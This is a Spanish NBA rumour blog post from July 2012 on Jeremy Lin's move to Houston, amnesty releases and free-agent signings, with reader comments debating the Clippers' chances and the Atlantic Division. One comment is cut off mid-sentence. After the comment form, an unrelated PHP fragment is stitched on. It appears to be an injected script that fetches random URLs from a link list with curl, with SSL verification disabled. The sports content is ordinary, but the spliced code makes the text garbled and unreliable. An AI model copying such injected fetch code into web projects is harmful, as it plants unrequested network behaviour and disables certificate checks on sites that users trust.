Rumorología variada 2

19 de July de 2012 por MagicJohnson32

El mercado NBA ha acelerado esta semana, que ha estado marcada por la fecha límite para la aplicación de la cláusula de amnistía y por la decisión de los Knicks de no igualar la oferta de los Rockets por Jeremy Lin. En paralelo, varios agentes libres han encontrado nuevo equipo, otros ha renovado y, por supuesto, los rumores en torno a Dwight Howard siguen tan activos como un avispero. Por partes:

¿Qué ha pasado?

ACTUALIZACIÓN

(27/07, 19:45 h) Finalmente se ha cerrado el traspaso por el cual los Hornets reciben a Robin Lopez, Hakim Warrick y cash, los Suns se llevan a Wesley Johnson, una primera ronda, Jerome Dyson y Brad Miller, y los Timberwolves se hacen con dos segundas rondas. Cabe recordar que el movimiento permite a los Wolves la contratación de Andrei Kirilenko.

(26/07, 10:30 h) Sigue sin confirmarse el acuerdo a tres bandas que llevaría a Robin Lopez a los Hornets. Sin este movimiento, los Wolves no tendrían hueco suficiente para firmar a Kirilenko por las cifras que se barajan. Sí se ha confirmado que Ronny Turiaf jugará en los Clippers la próxima temporada. Y en el enésimo capítulo del culebrón Dwight Howard, los Mavs ganan fuerza como posible destino para el pívot una vez se convierta en agente libre el próximo verano.

(25/07, 23:45 h) 20 millones de dólares en dos años es lo que, según adelanta Wojnarowski, van a pagarle los Wolves a Andrei Kirilenko. Señala Woj que el acuerdo es inminente.

(25/07, 17:45 h) Marco Belinelli ya es jugador de los Bulls, a los que se ha comprometido por la biannual. También hemos sabido hoy que el nuevo contrato de Jameer Nelson con los Magic le reportará al base alrededor de 8.5 millones de dólares por cada uno de los tres años que la franquicia de Florida le firmó.

(25/07, 12:30 h) Las últimas horas han dejado las renovaciones de Delonte West por los Mavs y Keyon Dooling por los Celtics. También hemos sabido por Adrian Wojnarowski que Suns, Hornets y Wolves negocian un acuerdo a tres bandas según el cual Robin Lopez y Hakim Warrick irían a New Orleans, mientras que Minnesota mandaría a  Wes Johnson y una 1ª ronda a los Suns. De esta manera, los Wolves ganarían la flexibilidad necesaria para hacerse con Andrei Kirilenko, de quien ya comentábamos ayer que pretende regresar a la NBA.

(24/07, 18:55 h) Gar Forman, GM de los Bulls, ha anunciado que la franquicia no igualará la offer sheet que los Rockets le firmaron a Omer Asik. El turco se convierte así en compañero de Jeremy Lin.

(24/07, 18:15 h) Los Knicks añaden a Ronnie Brewer a su plantilla, probablemente con la idea de cubrir la ausencia de Iman Shumpert mientras se recupera de su lesión de rodilla. Brewer va a NY con un contrato de un año. Hoy también hemos sabido que Andrei Kirilenko planea su regreso a la NBA. Además, esta próxima madrugada finaliza el plazo de los Bulls para igualar la oferta de los Rockets por Asik, cosa que no harán salvo sorpresa de última hora.

(24/07, 11:00 h) Randy Foye, uno de los agentes libres más destacados que quedaban, se une a los Jazz. Los Suns, por su parte, han firmado al trotamundos PJ Tucker.

(22/07, 11:55 h) Los Celtics refuerzan su juego interior con Jason Collins (un año por el mínimo), y todo apunta a que no igualarán la oferta que los Wolves han hecho por Greg Stiemsma (un año, 3 millones). Por otra parte, Nazr Mohammed, de quien se decía que iba a firmar por los Nets, parece ahora a un paso de los Bulls, quienes estarían buscando un recambio para Asik ante su más que probable marcha a los Rockets.

(21/07, 12:10 h) Jordan Hill renueva por dos temporadas y cerca de 8 millones con los Lakers. Se han hecho oficiales varios movimientos ya conocidos: Michael Beasley por los Suns, Courtney Lee por los Celtics y Anthony Randolph por los Nuggets.

(20/07, 15:10 h) Sasha Pavlovic también entra en el traspaso de los Celtics por Courtney Lee y jugará en los Blazers. Por su parte, los Wolves buscan un interior y se baraja nombres como los de Jordan Hill, Greg Stiemsma, Leuer, Carl Landry, Ronny Turiaf. También andan tras Dominic McGuire y Ronnie Brewer.

(20/07, 00:17 h) Además, Ryan Hollins ha firmado con los Clippers y Keith Bogans se une a los Nets.

(19/07, 22:40 h) Los Celtics, según avaza Yahoo! Sports, han llegado a un acuerdo con los Rockets para el sign & trade de Courtney Lee. La franquicia texana recibirá a JaJuan Johnson, E’Twaun Moore y Sean Williams, así como una 2ª ronda.

jeremy lin

Jeremy Lin ya es un Rocket. La franquicia texana le firmó al base una offer sheet de 25 millones en tres temporadas y dio paso a los que con toda probabilidad han sido los tres días más difíciles en la vida de James Dolan. Los quince millones que Lin ganará en la 14-15, cuando el nuevo convenio dispara la penalización a las franquicia reincidentes en el impuesto de lujo, han acabado pesando más que la ‘Linsanity’ y el siempre tan atractivo mercado asiático. Los Rockets, que ya saben algo de vender camisetas en China, se han salido con la suya. La afición Knickerbocker se tendrá que conformar con su nuevo trío de bases, compuesto por Felton, Kidd y Prigioni.

Los amnistiados. Los equipos han vuelto a echar mano de la cláusula de amnistía para enmendar errores, aligerar sus cuentas y acelerar sus reconstrucciones. El pasado martes finalizó el plazo para aplicar dicha cláusula (hasta el próximo verano, cuando las franquicias dispondrán de una última oportunidad), y entre las ‘víctimas’ hubo un par de ilustres como Elton Brand y Luis Scola, y otros que se lo han ganado a pulso -Andray Blatche, Brendan Haywood, Josh Childress y Darko Milicic. Clippers y Nuggets amnistiaron a Ryan Gomes y Chris Andersen para poder firmar a Grant Hill y Anthony Randolph respectivamente. De todos los amnistiados, solo recibieron pujas Brand (que jugará en Dallas), Scola (Phoenix Suns) y Haywood (claro está, a los Bobcats). El resto se convierten en agentes libres sin restricciones.

Los renovados. Tras estar aparentemente muy cerca de completar el traspaso por Dwight Howard, los Brooklyn Nets se decantaron por atar a su pareja interior, Brook Lopez & Kris Humphries. Las cifras: 61 millones en cuatro años para Lopez y 24 millones en dos años para el ex-Kardashian. Ya se sabe que el centímetro va caro pero ¿tanto? Con ellos, más Deron, Joe Johnson y Gerald Wallace, los Nets completan su quinteto titular para la 12-13.

Sin el impacto mediático del culebrón Lin, la otra gran historia entre los FA restringidos ha sido la de Batum. El francés firmó una offer sheet con los Wolves y dejó muy claro que no deseaba regresar a Portland. Ambas franquicias negociaron la posibilidad de un sign & trade y se especuló con la marcha de Derrick Williams a los Blazers. Finalmente, no ha habido acuerdo y Batum seguirá en Oregon con un contrato de cuatro temporadas y cerca de 46 millones de dólares.

Cuatro años y 44 millones es lo que se ha llevado Javale McGee, quien acaba de renovar por los Nuggets. El universo está ansioso por ver a McGee y Anthony Randolph jugar juntos, y si George Karl logra que la cosa funcione, proponemos el CoY para él desde ya.

Y hasta los 58 millones en cuatro años se va Eric Gordon, renovado por los Hornets tras igualar la oferta de los Suns.

Los que cambian de aires. No ha hecho un mal trabajo Mark Cuban tras la espantada de Kidd y Terry. En pocos días se ha hecho con Darren Collison, OJ Mayo, Elton Brand y Chris Kaman, y ha rearmado a su equipo con suficientes garantías de cara a seguir siendo competitivos.

También hay que loar a los Kings, que tan limitados de recursos económicos como se hallan, han incorporado a Aaron Brooks y James Johnson a un equipo joven y que sin duda echa en falta experiencia, pero que solo puede ir hacia arriba.

Los Nets están teniendo un mes de julio de lo más completo y también han añadido a su plantilla al ex-Baskonia Mirza Teletovic, el ex-Bulls C.J. Watson y el ex-decenas-de-equipos Jerry Stackhouse.

Korver y Hinrich intercambian equipos. Los Hawks, que ya se hicieron recientemente con Lou Williams, añaden a Korver, mientras que Hinrich regresa a los Bulls para suplir a Rose durante su lesión.

Y los Sixers, necesitados de juego interior, han firmado a Kwame Brown.

¿Qué pasará?

– El ofertón de los Rockets por Asik se tramitará el viernes. Hay dudas sobre si los Bulls renovarán, aunque cuesta imaginar que Chicago esté dispuesto a caer en un error provocado por Houston.

– Los Bulls anunciarán en breve el fichaje de Vladimir Radmanovic e iniciarán la negociación para la ampliación de contrato con Taj Gibson.

dwight howardVarios frentes abiertos para los Lakers. A la espera de que Antawn Jamison regrese de sus vacaciones y estampe su firma en el contrato, la franquicia angelina se han hecho con los servicios del veterano PF para la próxima temporada. Los titulares se los sigue llevando la negociación por Dwight Howard, que según realgm y ESPN, parece haber cambiado de opinión y estar dispuesto a firmar una extensión de contrato si es traspasado a los Lakers. Los rumores apuntaban últimamente a un traspaso a tres bandas en el que los Cavs recibirían a Bynum, con Anderson Varejao y rondas del draft destino Orlando. Para apuntalar el juego interior, los Lakers están contemplando incorporar a Jermaine O’Neal, quien se sometió a un work out ante Mitch Kupchak. Además, parece que ofrecerán la mini mid level al F.A. restringido Brandon Rush, pero los Warriors ya han asegurado que igualarán cualquier oferta que reciba.

Los Celtics, que han perdido a Ray Allen pero han sumado a Terry y han renovado a Garnett, Jeff Green, Wilcox y Bass, andan tras Courtney Lee, pero sale demasiado caro para lo poco que pueden ofrecer. Los Celtics intentaron en vano acordar un s&t con los Mavs por Terry, lo que les habría permitido reservar la midlevel para abordar un fichaje como el de Lee. En las últimas horas se han fijado en Carlos Delfino y también se especula con un posible interés en Milicic, en caso de que no puedan renovar a Stiemsma. Milicic también está bajo la mirada de Miami, Bulls, Clippers y Nets.

Como en el caso de Darko, en los próximos días debería de haber noticias sobre los amnistiados que no han recibido pujas. La pregunta es: ¿quién se atreverá a darle un contrato a Blatche?

John Lucas III está a un paso de los Raptors, lo cual no hace más que incidir en lo obvio: Toronto busca el traspaso de Calderón. Con Kyle Lowry acabado de llegar, parece más que probable que sea solo cuestión de tiempo que el base extremeño cambie de equipo.

Seguiremos informando.

Comenta

180 comentarios a esta entrada

  1. simon dice:
    #1

    Isiah Thomas volviendo a NYK?? estan en serio? despues del solar que dejo en NYK piensan en el otra vez para incluirlo en el organigrama de la franquicia… en fin… mi no entender…

      Citar

  2. Denise dice:
    #2

    Matt Barnes a Clippers. Buen fichaje para los angelinos. Claro Top 4 del Oeste.

      Citar

  3. Melo15 dice:
    #3

    Se puede saber que hara Barnes en los Clippers este año como suplente de Butler y Hill? Agitar toallas o rellenar Gatorades?

      Citar

  4. Esteban dice:
    #4

    si coincido, claro top 4 del oeste, pero a la vez me da la sensacion que es un claro NO TOP 2 del oeste, por mejor que se armaron, a mi entender no tienen como derrotar al thunder o a lakers, salvo una explosion de griffin similar a la de love, pero con la lesion lo dudo mucho

      Citar

  5. Esteban dice:
    #5

    Melo15:
    Se puede saber que hara Barnes en los Clippers este año como suplente de Butler y Hill? Agitar toallas o rellenar Gatorades?

    cuidado que los clippers tienen muchos viejos, va a tener partidos de sobra para jugar, y no nos olvidemos que billups esta lesionado por un tiempo, por lo que o jamal o hill saldran de titular de 2 al comienzo de temporada, por lo q tendra mas minutos de lo q crees melo

      Citar

  6. Sancho88 dice:
    #6

    Supongo que este año nadie volvera a repetir la bacalá de que el este y el oeste están mas cerca que nunca verdad?? eso espero…

      Citar

  7. simon dice:
    #7

    Sancho ya te digo yo que alguien vendrá diciendo eso antes o despues en la temporada ajaja. Es el cuento de nunca acabar, llevo escuchando eso de que el OESTE y el ESTE estan cada vez mas cerca desde que empece a seguir la NBA en serio, hace unos 6-7 años. y la unica vez que me lo ha parecido que ( podrían ) acercarse ambas conferencias fue hace dos años, cuando Anthony y Stoudemire salían rumbo al ESTE pero la temporada acabó demostrando que nanai del paraguai, para mi esta temporada la diferencia se ha acrecentado aun mas…

      Citar

  8. Denise dice:
    #8

    Melo15:
    Se puede saber que hara Barnes en los Clippers este año como suplente de Butler y Hill? Agitar toallas o rellenar Gatorades?

    Queridos Melo, creo que no conoces a Matt Barnes, no es una referencia ni su rol es el de liderar al equipo, pero hace un trabajo dentro de su rol muy bueno, y te recuerdo que ha estado en grandes plantillas y en todas ellas ha tenido bastante protagonismo.
    – En aquellos GSW liderados por Baron Davis del “We Believe” era un magnífico sexto hombre, posiblemente de los mejores de esa temporada.

    – En los Suns de Nash, Stoudemire y compañia se marcó un temporadón, ganándose un sitio en el 5 inicial y rompiendo partidos a base de triples. Hablando de memoria, juraría que ese año haría como una docena de partidos por encima de los 20 puntos o partidos con mas de 5 triples y cosas así…

    – Después viene a Orlando, con el plantillón que tenía y vuelve a ganarse el puesto de titular arrebatandoselo a buenos jugadores como Mickael Pietrus (en ese momento era bastante bueno) y JJ Redick.

    – Por último, ficha por Lakers y juega mejor que su alero titular Metta World Peace, haciendo números bastante buenos. En la última temporada promedió 8 puntos y 5.5 rebotes en poco más de 20 minutos.

    Con esto quiero decir que, es verdad que, al tener los Clippers un plantillón super profundo en las alas, va a tener mucha competitividad, pero no me parecería descabellado que fuese un jugador de rotación, y más teniendo en cuenta que Hill tiene ya 40 años y habrá que dosificarlo; y Caron Butler viene de hacer unas últimas temporadas nefastas (revísate su horrible ultimo Play-offs).

    Además, creo que se desconoce aún su salario, pero este tío ha cobrado poquisimo a lo largo de su carrera comparado con otros. En todos los equipos mencionados anteriormente, no ha cobrado mas de 2.5 kilos por año. No creo que en los Clippers cobre mucho más.

    Conclusión: Me parece un gran acierto de Clippers, los cuales, si Griffin y De Andre han progresado durante este verano, y Odom vuelve a un nivel decente; les doy hasta posibilidades reales de anillo.

    Barnes no es

      Citar

  9. Sancho88 dice:
    #9

    Anillo Clippers?? Yo ya debo de estar alucinando…

      Citar

  10. simon dice:
    #10

    yo tampoco veo a los Clippers luchando por el anillo, para mi su tope estará en disputar ( y dar un susto ) a Thunder y Lakers en una hipoteticas semis de conferencia pero ya está, sin pasar de un susto.

      Citar

  11. Denise dice:
    #11

    Sancho88:
    Anillo Clippers?? Yo ya debo de estar alucinando…

    Y en vez de burlarte de mi comentario, por qué no argumentas el tuyo; mas que nada porque como lector de cualquier blog no me gusta leer comentarios burlones e intranscendentes sin ni siquiera argumentar la postura.
    Y te lo digo de buen rollo.

    Además, si lees detenidamente mi comentario, veras que les doy posibilidades de anillo en el caso de que Odom vuelva a un nivel decente, y sus dos interiores titulares, Griffin y De Andre hayan progresado ofensivamente y no metan puntos solo a base de mates.

    En ese escenario, los Clippers si los vería con posibilidades de anillo, eso no quita que por supuesto hay mejores equipos con mas posibilidades. Pero macho, leeis anillo y os vais a la yugular. Tranquilizaos.

    No sé entonces que esperais de un equipo con uno de los mejores bases del campeonato, con anotadores exteriores de buen curriculum como Crawford y Butler; veteranos de lujo como Billups, Hill y Odom; buenos defensores como Barnes y Turiaf; una pareja titular interior fisicamente muy podrosa como Griffin y Jordan; y en definitiva una plantilla super profunda a la que añadimos Bledsoe, Hollins y Green.

      Citar

  12. Sancho88 dice:
    #12

    Todos los jugadores que dices son de segundo nivel. Solo Paul es de primero y Griffin puede llegar a serlo (Billups nadie sabe como volverá), pero hasta ahí. Competir con Thunder o Lakers como dice SImón es imposible a estas alturas para Clippers. Y siento que te haya parecido una ofensa o una burla mi comentario, no era mi intención. Y mi explicación es esa. Este año los Spurs destaparon a los Clippers reales, que dependen cien por cien de Paul en momentos calientes. Nada me hace suponer que con medianías o jugadores como Hill, Odom, Barnes, Jordan, etc. sean capaces de asaltar la conferencia Oeste. Pero es solo mi opinión lógicamente y la tuya es respetable al cien por cien. Ya fue una sorpresa que pasaran de primera ronda contra Memphis, pero reconozco que este año deben de pelear por ser líderes de conferencia en la temporada regular junto a OKC y Lakers, pero les daría posibilidades hasta semifinales, nada más. Eso es lo que me dice mi propia lógica, ojo, pero cada uno puede tener la que considere conveniente

      Citar

  13. Denise dice:
    #13

    No me parece una ofensa, simplemente creo que el blog no se enriquece con una burla sin nada más.
    Si haces la burla y después el comentario argumentado, por mi perfecto.

    Repito, yo tampoco creo que sean los nº1 a ganar el anillo; pero en teoría tienen equipo para poner en serios aprietos a los dos a priori favoritos Lakers y Thunder.

    Exigirle entrar a Playoffs y llegar a semifinales sin más, me parece un objetivo poco ambicioso para esta plantilla tan profunda.

    Por cierto, yo que soy amante de las plantillas profundas; la de los Thunder me parece bastante corta a no ser que alguno de los rookies que tiene, a los cuales desconozco, sean buenos.
    Equipazo, si por supuesto, pero de 8-9 jugadores para mas de 100 partidos que tendrán que jugar si quieren el anillo.

      Citar

  14. rumbero dice:
    #14

    Si en el fondo venís a decir lo mismo. Tienen una muy buena plantilla pero para aspirar al anillo necesitan las mejores versiones de algunos. Por Jordan no daría un duro esperando mejoras la verdad, pero Griffin está obligado a dar un salto si o si (por su supuesta calidad y por el contratazo que tiene firmado). Odom creo que es una auténtica incógnita ahora mismo, y de Crawford, Barnes y Hill ya sabemos que podemos esperar. Y a ver si Bledsoe va teniendo más minutos.
    A mi me parece un buen equipo, que como dice Sancho depende muy mucho de Paul, pero que tiene bastante más calidad y profundidad que la temporada anterior. Le falta Reggie Evans eso si…que pérdida
    Veremos a ver hasta donde llegan. Para mi estan obligados a llegar a semis de conferencia y dando guerra

      Citar

  15. Sancho88 dice:
    #15

    Precisamente Denise, lo de las plantillas profundas en la NBA no funciona. Mira los Nuggets el año pasado, tenían absolutamente de todo en todas las posiciones y mira… duraron lo que duraron. Incluso los Spurs, equipo impecable y al final sucumbieron porque no tenían suficientes piernas jóvenes (ojo, no digo lo mismo de Clippers, lo digo en término de estrellas). Aquí de lo que se trata es de tener al menos tres jugadores de primerísimo nivel. Ya digo, si viene Billups y vuelve a ser Billups, me callo y disfruto de los Clippers, pero de momento Griffin no ha dado todo lo que esperábamos de él, por lo menos para mí, no es ni un 70% del jugador que yo imaginaba hace dos años. Así no van a poder aspirar a dar zarpazos verdaderamente fuertes.

    Eric Bledsoe merece muchísimo más de Del Negro, se lo ha ganado el tipo siendo totalmente profesional y jugando incluso la liga de desarrollo… que ya tiene bemoles. Por talento debería aparecer como la tercera o cuarta espada del equipo. Lo que creo que este año mejorará desde el principio es la defensa. El año pasado fueron a bandazos, empezaron de puta madre, luego se deprimieron tras la lesión de Billups y acabaron más que decéntemente defensivamente. Eso lo tienen que manejar bien desde el principio, y luego los apagones en anotación en momentos puntuales… no sé, deben ser más regulares. Jordan se tiene que imponer atrás, no solo poner tapones, y Hill va a aportar grandes dosis de concentración atrás, eso segurísimo. Griffin tiene que poner tb. mucho más de su parte y no solo poner tapones tb… Espero que Odom vuelva a ser el Odom de antaño y se motive en sus Clippers. Hill y Odom concentrados aportarían esa experiencia y gran defensa que necesita el equipo. El carácter como dice Rumbero lo ponía Evans, pero no tenía absolutamente nada más. En condiciones normales Odom podría hacer ese mismo trabajo aderezado de talento.

    Mi opinión es que de entrada no aspiran a más de semifinales, con lo que hay ahora. Ahora bien, si vuelve Billups bien y Griffin evoluciona, tendremos otro equipo, pero de entrada no es así.

      Citar

  16. MagicJohnson32 dice:
    #16

    Pues yo veo a los Clippers como Top 4 en el Oeste bastante claro. Lo de ‘aspirantes’ a semis de Conferencia se les queda un pelín corto. De entrada creo que sería una sorpresa (negativa) que no estuviesen en semis. Los fichajes de Odom, Hill y Crawford son una enorme mejora. No para convertirlos en favoritos pero sí para tenerlos en cuenta.

      Citar

  17. GreenPride dice:
    #17

    Para mí los Clips este año son el tercer equipo por plantilla del Oeste pero creo que andan lejos de los 2 primeros todavía. Creo que tienen mejor equipo que el año pasado, ahora sólo queda por saber si Griffin y DeAndre Jordan valen lo que pagan por ellos o no. Si explotan (especialmente Griffin) y el equipo tira para arriba con veteranos motivados como Hill, Odom, Barnes o Billups pueden ser un equipo muy peligroso en PO que puedan incluso asustar a uno de los dos favoritos. Año clave para Griffin, veremos si se queda en jugador de medio pelo o puede aspirar a ser la estrella que se pronosticaba en su primer año

      Citar

  18. Melo15 dice:
    #18

    Creo que mas o menos todos venimos a decir lo mismo, los Clippers tienen un buen equipo, con una buena combinacion de jovenes y veteranos que les podrian llevar hasta Semifinales aunque si se da el caso de que Griffin mejora la defensa, tiros libres…podrian desbancar a Lakers o Thunder.
    PD: Nose vosotros pero yo estoy un poco decepcionado con Gruffin, no ha progresado nada desde su año rookie y creo que se va a quedar en Shwan Kemp cuando ser Karl Malone.

      Citar

  19. Sempren dice:
    #19

    “No ha progresado nada desde su año rookie”
    Hombre, solo hubo una temporada desde su año rookie xD
    Si bien es cierto que con el lockout se podría esperar que trabajase esos aspectos que tanto necesita, tampoco es cosa de que se hable de él como si llevase años estancado y sin afán por mejorar.
    Y no soy defensor de Griffin precisamente

      Citar

  20. HisRoyalAirness dice:
    #20

    Melo15:
    Creo que mas o menos todos venimos a decir lo mismo, los Clippers tienen un buen equipo, con una buena combinacion de jovenes y veteranos que les podrian llevar hasta Semifinales aunque si se da el caso de que Griffin mejora la defensa, tiros libres…podrian desbancar a Lakers o Thunder.
    PD: Nose vosotros pero yo estoy un poco decepcionado con Gruffin, no ha progresado nada desde su año rookie y creo que se va a quedar en Shwan Kemp cuando ser Karl Malone.

    Melo, Griffin puede ser mejor que Karl Malone…pelando patatas.
    Lo único que tiene similar es el físico pero es que ya sólo la defensa de “El Cartero” no la desarrolla Blake ni en mil vidas que viviera

      Citar

  21. Pop dice:
    #21

    Algún día me armaré de valor y verborrea y defenderé el título ficticio de mejor PF de la historia para Malone, aunque visto lo visto seré franca minoría en el blog, pero bueno.

      Citar

  22. Sancho88 dice:
    #22

    Pop:
    Algún día me armaré de valor y verborrea y defenderé el título ficticio de mejor PF de la historia para Malone, aunque visto lo visto seré franca minoría en el blog, pero bueno.

    Tengo un colega muy de los Spurs que te crujiría por tamaña aseveración, 😀

      Citar

  23. Pop dice:
    #23

    Sancho88: Tengo un colega muy de los Spurs que te crujiría por tamaña aseveración,

    Lo entiendo, ese es el dilema, pero estoy dispuesto a defenderme 😉

      Citar

  24. Melo15 dice:
    #24

    Aver no hay que olvidar que Griffin tiene 22 años, a esa edad Malone estaba en la universidad, asi que no veo motivos para que Griffin no pueda defender, no igual que Malone porque le falta mala leche pero si a un gran nivel.
    Como ya e dicho esta todo en su mano, la base la tiene (fisico, rebote, sabe definir) y el resto son cosas que se mejoran a base de intensidad y trabajo.
    PD: Para mi no hay discusion acerca de quien es el mejor 4, es Duncan tanto por meritos individuales como colectivos. Hay algo en que Malone supere a Duncan? Aparte de en puntos anotados.

      Citar

  25. lost dice:
    #25

    Este año, la división atlántica será ÉPICA. Los orgullosos verdes mejoran con Green, Terry y Lee a los del año pasado; los Knicks mantienen el bloque, sale Lin y llegan Camby, Brewer, Kidd y Felton; Philly dice adiós a Iggy pero llega un jugador franquicia: Andrew Bynum; los Nets regresan con Deron, JoJo, Wallace, Lopez&Humphries y relleno; y los Raptors… Valanciunas xD Creo que a nivel defensivo es la mejor división. East Coast Defense!

      Citar

  26. Pop dice:
    #26

    Melo15:
    Aver no hay que olvidar que Griffin tiene 22 años, a esa edad Malone estaba en la universidad, asi que no veo motivos para que Griffin no pueda defender, no igual que Malone porque le falta mala leche pero si a un gran nivel.
    Como ya e dicho esta todo en su mano, la base la tiene (fisico, rebote, sabe definir) y el resto son cosas que se mejoran a base de intensidad y trabajo.
    PD: Para mi no hay discusion acerca de quien es el mejor 4, es Duncan tanto por meritos individuales como colectivos. Hay algo en que Malone supere a Duncan? Aparte de en puntos anotados.

    Yo no creo “que no haya discusión”. Entiendo perfectamente que a Duncan se le considere el nº1 histórico, pero creo que hay argumentos para decidir también en favor del cartero. Aunque también digo una cosa: son 2 PF muy diferentes. Duncan en realidad es un falso pívot, Malone era un falso alero. Los dos son “4”s pero para mí son puestos diferentes. Lo que decanta la balanza del lado de Duncan son sus títulos. En una comparación cara a cara uno gana en unos aspectos y otro en otros.

      Citar

  27. Denise dice:
    #27

    lost:
    Este año, la división atlántica será ÉPICA. Los orgullosos verdes mejoran con Green, Terry y Lee a los del año pasado; los Knicks mantienen el bloque, sale Lin y llegan Camby, Brewer, Kidd y Felton; Philly dice adiós a Iggy pero llega un jugador franquicia: Andrew Bynum; los Nets regresan con Deron, JoJo, Wallace, Lopez&Humphries y relleno; y los Raptors… Valanciunas xD Creo que a nivel defensivo es la mejor división. East Coast Defense!

    Yo no los veo tan épicos. Los Raptors no deberian entrar en Playoffs, los Nets y los Knicks creo que serán los grandes fracasos como todos los años, los Sixers tampoco veo que hayan mejorado excesivamente.
    Nets, Knicks y Sixers sufrirían en el Oeste para entrar a Playoffs.
    Y los Celtics no creo que son mejores que los 4 mejores del Oeste.

    Conclusión: Creo que hay divisiones más epicas que esta.

      Citar

  28. rumbero dice:
    #28

    Denise: Yo no los veo tan épicos. Los Raptors no deberian entrar en Playoffs, los Nets y los Knicks creo que serán los grandes fracasos como todos los años,los Sixers tampoco veo que hayan mejorado excesivamente.
    Nets, Knicks y Sixers sufrirían en el Oeste para entrar a Playoffs.
    Y los Celtics no creo que son mejores que los 4 mejores del Oeste.

    Conclusión: Creo que hay divisiones más epicas que esta.

    Hombre Denise, yo creo que incorporar a un center como Bynum en el equipo es una mejora más que notable para los Sixers. Habrá que ver que papel tiene en el equipo y si da un paso adelante, pero debería convertirse en el pívot dominante del este. Pierden a un all star como Iguodala eso si, pero se han traido a Wright, Young y Richardson con los que le queda un backcourt apañado. Yo tengo ganas de verlos la verdad.

    PD: Para seguir un poco con el topic del hilo, parece que los Blazers le van a dar una última oportunidad a Adam Morrison 😀

      Citar

  29. txusma dice:
    #29

    Iguodala es un gran jugador pero creo que se pisaba con Holiday y Turner. Cambiarlo por Andrew Bynum, el 2º mejor pívot de la liga es una mejora en toda regla. Esa pareja Hawes-Bynum es muy interesante.

      Citar

  30. Melo15 dice:
    #30

    No estoy de acuerdo contigo Denise, la unica division que le hace competencia a la Atlantic es la Northwest y por poco.
    Todos sabemos de que son capaces los Celtics, los Nets tienen uno de los mejores quintetos de la liga, Philly tiene al mejor pivot del Este, Toronto en principio no es candidata para Playoffs pero va a dar guerra seguro y Nueva York tiene uno de los equipos mas profundos de la liga y Kidd va aportar la veterania y liderazgo que antes no acababamos de tener. En mi opinion la Divison mas fuerte pero eso no significa que jueguen mas partidos entre ellos l si?

    txusma:
    Iguodala es un gran jugador pero creo que se pisaba con Holiday y Turner. Cambiarlo por Andrew Bynum, el 2º mejor pívot de la liga es una mejora en toda regla. Esa pareja Hawes-Bynum es muy interesante.

    Ya dijo Doug Collins que queria que Hawes hiciese el mismo papel que Pau en los Lakers, para lo que esta mas capacitado que Pau.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>